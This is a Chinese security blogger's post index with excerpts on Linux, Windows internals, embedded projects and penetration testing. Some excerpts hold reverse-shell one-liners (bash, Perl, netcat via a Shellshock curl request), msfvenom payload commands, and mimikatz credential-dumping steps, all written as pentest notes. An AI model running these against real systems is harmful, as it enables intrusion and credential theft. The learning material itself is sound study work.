- 博客(36)
- 资源 (2)
- 收藏
- 关注
原创 linu进程产生方式
fork()执行一次,返回两次,父进程返回子进程ID号,子进程返回0system()通过调用/bin/sh command 执行特定命令,阻塞当前进程,运行是会调用fork()、execve()、waitpid()等函数,直到command命令执行完毕exec()会使用新进程代替原进程,新进程的PID号与原进程相同...
2019-04-22 10:54:37 222
原创 基于arduino与raspberry的远程数据采集系统
前言该课题是毕业时做的一个远程数据采集课题,今天无意翻看到这份报告,不禁勾起满满的怀念。重新看了一遍报告,感觉做的确实是挺low的,但想起当时自己查了无数的资料,才完成这个设计,尤其是人在学校,然后通过浏览器直接远程查看到了自己家里面的环境状况,那种喜悦与自豪,对于一个理科生来说,是完全没法用语言来描述的。不过,在构思与设计期间也确实踩了很多坑,故在此分享记录一下,更希望能有有缘的学弟与学妹能...
2019-03-10 16:22:33 5785
原创 一句话解释shellcode、payload、exploit
shellcode是一系列指令payload是实现如何连接shell,或者控制靶机做什么操作的一段shellcodeexploit是一段携带payload的,对特定漏洞的利用代码用一句话概括变为:exploit包含payload,payload由shellcode组成。...
2019-02-25 22:46:05 1531
翻译 oscp认证考试指南
目录简介第一节: 考试要求文档要求Exploit 代码考试证据控制面板提交截图要求考试限制Metasploit 限制第二节:考试信息考试网络连接考试控制板靶机快照恢复考试中proof文件分值分配取消得分建议使用的报告模板奖励积分网络连接问题联系方式提交说明提交格式和名称压缩文件提交上传收到确认书其他必要信息结果常见问题简介这份指南以解释oscp认证考试为目的。第一部分描述考试前需要准备的工具等...
2019-02-18 22:11:44 24105 2
原创 windows线程状态
文章目录线程状态就绪态备用态运行态等待态转换态终止态线程关系线程同步线程互斥实现同步与互斥方法线程同步实例未同步状态使用临界区实现同步使用事件实现同步信号量使用互斥量使线程同步线程状态就绪态可以被调度执行,微内核分流器跟踪所有就绪进程,并按优先级顺序进行调度。备用态备用线程已经被选择下一次在一个特定的处理器上运行。该线程在这个状态等待,直到那个处理器可用,如果备用线程的优先级足够高,正在...
2019-01-29 13:53:07 3796
原创 查看ios文件系统
越狱查看文件系统前提,使用低版本越狱手机端安装Apple File Conduit 2通过cydia安装(越狱手机自带)mac端安装iFunBox下载http://www.i-funbox.com/zh-cn_download.html文件系统如下:...
2019-01-25 13:26:18 2612 1
原创 mac虚拟机扩容
分配磁盘大小扩展磁盘空间前需要删除所有快照,不然无法扩展处会显示灰色挂载磁盘disk0为磁盘disk0s2 为实际挂载分区,我们需要该给分区扩容diskutil resizeVolume disk0s2 60GB成功扩容...
2019-01-25 11:17:50 796
原创 mobsf安装使用
目录下载安装启动下载 git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git cd Mobile-Security-Framework-MobSF安装安装必要模块(使用这种方式安装,只能使用python2启动)./setup.sh为了使用python3启动,需要安装其他依赖 python3 -...
2019-01-22 12:24:21 4342
原创 windows进程创建函数CreatProcess
目录函数描述psApplicationNamepszCommandLinepsaProcess、psaThread、binheritHandlesfdwCreatepvEnvironmentpsCurDirpsiStartInfoppiProcInfo终止进程的运行主线程的进入点函数返回ExitProcess函数返回TerminateProcess函数返回进程枚举函数描述 BOOL Creat...
2019-01-18 15:11:44 1400
原创 windows进入函数与启动函数
目录应用程序启动进入函数WinMain -- WinMainCRTStartupwWinMain -- wWinMainCRTStartupMain -- mainCRTStartupWmain -- wmainCRTStartupC/C++ 运行期启动函数启动函数功能调用wWinMain函数调用WinMain函数调用wmain函数调用main函数exit函数操作系统实际上并不调用你编写的进入...
2019-01-18 13:47:36 1313
原创 nmap脚本使用
脚本类别描述auth与用户认证相关broadcast使用广播收集网络信息brute暴力破解default默认,执行脚本(-sC)discovery与主机和服务发现相关的脚本dos与拒绝服务攻击有关的脚本exploit利用安全漏洞external用于第三方服务fuzzer模糊测试intrusive入侵脚本...
2019-01-16 17:51:53 880
转载 creating meterpreter shells with msfvenom
List payloadsmsfvenom -lBinariesLinuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p w...
2019-01-16 16:29:45 132
原创 反弹shell
通过webshell获取交互式shell首先远程打开监听nc -l -vv -p portBashbash -i >& /dev/tcp/10.0.0.1/8080 0>&1PERLperl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("...
2019-01-16 16:14:53 198
转载 升级交互式shell
https://www.freebuf.com/news/142195.html方法1:使用Python作为一个伪终端python -c 'import pty; pty.spawn("/bin/bash")'方法2:使用socat#Listener:socat file:`tty`,raw,echo=0 tcp-listen:4444#Victim:wget -q http...
2019-01-16 16:00:13 566
原创 解压缩文件
.tar 解包:tar xvf FileName.tar打包:tar cvf FileName.tar DirName———————————————.gz(注:tar是打包,不是压缩!)解压1:gunzip FileName.gz解压2:gzip -d FileName.gz压缩:gzip FileName.tar.gz 和fd .tgz解压:tar zxvf FileNam...
2019-01-16 15:42:46 707
原创 nmap 扫描脚本
官方文档:https://nmap.org/nsedoc/index.html搜索kali中默认扫描脚本:ls /usr/share/nmap/script | grep -i XX查看脚本数量:ls /usr/share/nmap/scripts/ | wc -l默认字典路径:/usr/share/nmap/nselib/data使用脚本通配符例如:--script=vuln --sc...
2018-07-05 22:18:30 1578
原创 kali运行apt-get updata 时出现校验数字签名时出错
apt-get updata 时出现校验数字签名时出错。此仓库未被更新,所以仍然使用此前的索引文件,可能原因是安装的gpg证书过期了。运行apt-key list查看发现从下面红色部分可知证书已经过期:/etc/apt/trusted.gpg--------------------pub rsa4096 2016-04-12 [SC] EB4C 1BFD 4F04 2F6D D...
2018-06-09 18:04:46 1541
原创 NRF24L01寄存器操作命令
NRF24L01寄存器操作命令 (一共8个):#define READ_REG 0x00 //读配置寄存器,低5位为寄存器地址 #define WRITE_REG 0x20 //写配置寄存器,低5位为寄存器地址 #define RD_RX_PLOAD 0x61 //读RX有效数据,1~32字节 #define WR_TX_PLOAD 0xA0 //写TX有效数据,1~32字节 #define FL...
2018-05-06 21:56:56 4446
原创 树莓派常见问题
通过串口启动树莓派:树莓派3的串口不再用于开机,因为时钟是由内核提供,时钟晶振被用于蓝牙模块,而内核的时钟不够稳定,因此无法直接通过串口登入树莓派,为了避免多余的设置,在没有显示屏的情况下,可以采用ssh的方式登入。配置树莓派通过无线上网功能:使用nano编辑器编辑wpa_supplicant.conf配置文件sudo nano/etc/wpa_supplicant/wpa_supplicant....
2018-05-02 19:41:04 867
原创 树莓派ssh以pi登入不进去
1、用桌面以root用户登入添加用户tester,添加过程中会提示输入此用户密码adduser tester2、 赋予tester root权限,修改 /etc/sudoers 文件,找到下面一行,在root下面添加一行,如下所示## Allow root to run any commands anywhereroot ALL=(ALL) ALLtommy ALL=(ALL...
2018-04-26 00:44:58 4106
原创 Android漏洞攻击面
Activity漏洞1、越权绕过创建activity时,exported为true2、组件导出导致钓鱼欺诈3、隐式启动intent包含敏感数据4、拒绝服务Service 漏洞1、权限提升2、service劫持3、消息伪造4、拒绝服务Broadcast Receiver 漏洞1、敏感信息泄露2、权限绕过3、消息伪造4、拒绝服务Content Provider 漏洞1、信息泄露2、SQL注入3、目录遍...
2018-04-22 11:55:22 560
原创 C/C++堆和栈的区别
C/C++堆和栈的区别主要有五点1、生命周期不同堆:一般由程序员分配释放,若程序员不释放,则程序结束时由OS回收栈:由编译器自动分配2、申请方式不同堆:程序中使用一个堆空间可以使用new关键字、malloc函数、calloc() 函数、realloc函数实现,当不需要这个堆空间时,可以使用delete关键字、free函数栈:由系统自动分配3、底层实现机制不同堆:生长方向向上生长,一般通过链表进行存...
2018-04-20 18:33:30 557
原创 C++新增特性
C++新增特性包括:引用const常量定义函数的默认参数内联函数函数重载强制类型转换输入输出流1、引用引用申明:数据类型 & 引用名 =变量名引用是变量的别名,引用本身占据存储单元,但表现出来的不是引用本身的地址,而是目标变量的地址,在作为函数参数是有如下特点:(1)在进行实参和形参的结合时,不会为形参分配内存空间,而是将形参作为实参的一个别名,即在内存中没有产生实参的副本,而使用一般变量...
2018-04-20 16:10:45 191
原创 网络层面的攻击
DDOS分类CC攻击:攻击方不接受UPD回复,攻击者发送给服务器查询操作。流量反射性SYN攻击:攻击方伪造大量不存在的IP,发送TCP数据包。流量反射放大型NTP(网络时间协议)攻击,NTP相应数据包比请求数据包打很多倍。流量放大倍数表:...
2018-04-18 18:28:49 4082
原创 segmentation fault
树莓派上运行NRF2401编译的程序时出现segmentation fault ,经检测当前使用的用户pi,当使用root时运行,便不会有错误。原因是这个错误就是因为非法访问了系统中的内存而导致的错误,比如一些系统中关键内存区域。...
2018-04-15 14:17:12 1731
原创 recipe commences before first target .stop
编译https://github.com/nRF24/RF24.git项目时,把文件下载到了以~开头的家目录,不管是root还是其他用户的家目录,都会提示这个错误,当把文件下载到 / 根目录再编译时便成功解决了这个问题。在编译example_linux中的文件前需要提起编译好RF24目录下的make文件。一开始网上找了很多资料说是make对格式要求很严格,特别是tab键和空格键要区分开,但毕竟是g...
2018-04-15 09:58:26 3082
原创 xss漏洞分析与利用
一、寻找XSS1、找到可控参数URL参数输入表单HTTP头部信息(user-agent、ip、location、referrer等)2、找到参数输出点HTML标签JavaScript事件DOM型3、精心构造payload二、利用BurpSuite实现自动化测试XSSValidator+phantomjs+xss.js1、burpsuite安装xss-validator插件2、安装phantomjs...
2018-04-13 10:56:03 3357
原创 文件格式分析
文件格式实质上是信息的一种的编码方式,在Windows中,采用扩展名来区分不同的文件格式。文本格式:txt 、doc 、docx图片格式:png、jpg、jpeg、bmp、gif音频格式:mp3txt:arsii码的方式存在doc:以二进制格式存储docx:作为一个zip压缩格式存在,是doc结合XML的一种格式,由于是分块存储,相比与doc文件完整性更安全png:无损压缩jpg:有损压缩jpeg...
2018-04-11 22:34:58 2125
原创 获取webshell方法
一、CMS获取webshell方法百度、googel二、非CMS获取webshell 1、数据库备份获取webshell2、抓包上传获取webshell3、SQL命令获取webshell4、模板修改获取webshell5、插入一句话获取webshell6、修改上传类型获取webshell三、其他方式1、PHPMyadmin 获取webshell2、Tomcat获取webshell3、weblogi...
2018-04-11 13:45:38 2212
原创 Windows密码安全性测试
一、本地管理员密码如何直接提取1、直接通过mimikatz读取管理员密码第一条:privilege::debug //提升权限第二条:sekurlsa::logonpassWords //抓取密码2、Lazagne 需要本地支持python 二、本地HASH远程登入主要通过MSF提供的exploit/windows/smb/psexec模块来完成。msf>exploit/windows/sm...
2018-04-11 12:37:47 754
原创 windows权限分析与密码安全测试
一、windows常见用户system:本地机器上用于最高权限用户administrator:基本上是本地机器上用于最高权限用户guest:拥有极少用户,默认情况被禁用二、windows2003常见用户组administrators:本地机器上用于最高权限用户组backup aperators:类似于administrators,本地机器上用于最高权限用户组guests:与user组权限相同dis...
2018-04-11 11:45:01 710
原创 树莓派上使用GPIO口用python读取DHT11
DHT11的python读取可以参考:https://github.com/szazo/DHT11_Python类似以下代码的亲测,测量的数据不准确,原因是对DHT11的时序处理不够精准,导致读到的二进制数据数据错误。import RPi.GPIO as gpio import time PORT=13 #使用的树莓派的PIN13也就是GPIO27,根据自己连接位置更改此参数 gpi...
2018-04-09 15:56:14 5004 5
原创 RF24/examples_linux/gettingstarted.cpp
1、<cstdlib>cstdlib是C++里面的一个常用函数库, 等价于C中的<stdlib.h>下面看cstdlib(即:stdlib.h)中常用到的函数:rand函数:用于产生随机数srand函数:用于初始化随机数种子system函数:用于DOS系统功能调用exit函数:用于退出程序qsort函数:快速排序itoa、atoi、atof等一系列转换函数malloc函数:...
2018-04-07 21:06:54 438
原创 破壳漏洞nc反弹shell
10.0.3.99 8080 为本地主机10.0.3.194 为受害机/bin/ 要加上完整路径x: () { :;}; 对空格敏感curl -H 'x: () { :;}; echo; /bin/nc -e /bin/sh 10.0.3.99 8080' http://10.0.3.194/bWAPP/cgi-bin/shellshock.sh...
2018-02-26 15:01:31 481
原创 wolfcms漏洞
利用CMS的上传功能结合Apache的文件名解析漏洞,前提需要以管理员权限登入后台参考链接:https://mochazz.github.io/2017/07/06/wolf_cms/ http://www.freebuf.com/articles/web/138640.html...
2018-02-23 10:23:44 963
Microsoft Visual C++
2018-04-21
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人